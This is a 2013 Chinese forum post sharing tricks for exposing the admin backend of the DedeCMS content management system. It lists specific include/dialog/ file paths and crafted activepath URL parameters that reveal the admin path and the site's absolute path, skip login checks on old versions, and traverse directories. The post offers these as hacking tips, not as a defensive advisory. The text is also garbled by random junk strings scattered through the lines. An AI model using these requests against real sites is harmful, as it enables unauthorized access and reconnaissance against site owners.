找回密码
 立即注册
查看: 2845|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理( B/ f2 b( W: W* f7 x; ]/ h

# ]3 d; \: P% @员帐号,新版本的就直接转向了后台.
% Q+ q* {) q, R4 d1 Q7 s& M, j
+ F1 D5 I% b# S5 _; x2.include/dialog/config.php会爆出后台管理路径9 @0 |, ^$ \. l: q6 Z7 {. g; N
$ {8 H6 n8 P: \  \" E& A0 L
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录5 G' v) e# l9 d% Y' a" u
: J  {* Y/ p+ Z! A' h8 [. n5 ?. P
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.6 }8 f+ g# |1 B- b& E! b

. e* i6 X! \6 `3 T# i( a, y5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
& ?# B2 J/ i+ {  _2 \" m: Z+ }- c1 v/ m
到根目录去.不过这些版本的访问地址有些不同.( J; P5 G' W2 I
地址为require/dialog/select_soft.php?activepath=/././././././././* j6 \; }* w+ l& G
4 x, a" _6 y) s5 I: T9 _+ u4 R
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦.., }( k' s% I9 f2 J1 ~' q
存在相同问题的文件还有7 f9 y7 }! S& Z& {
include\dialog\select_images.php
4 w  a. v: @: Y9 Xinclude\dialog\select_media.php
$ U$ y0 Z$ n# w! k# m* q$ dinclude\dialog\select_templets.php​
+ w- ^  r7 c3 T; A% e! Z4 D# a& x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表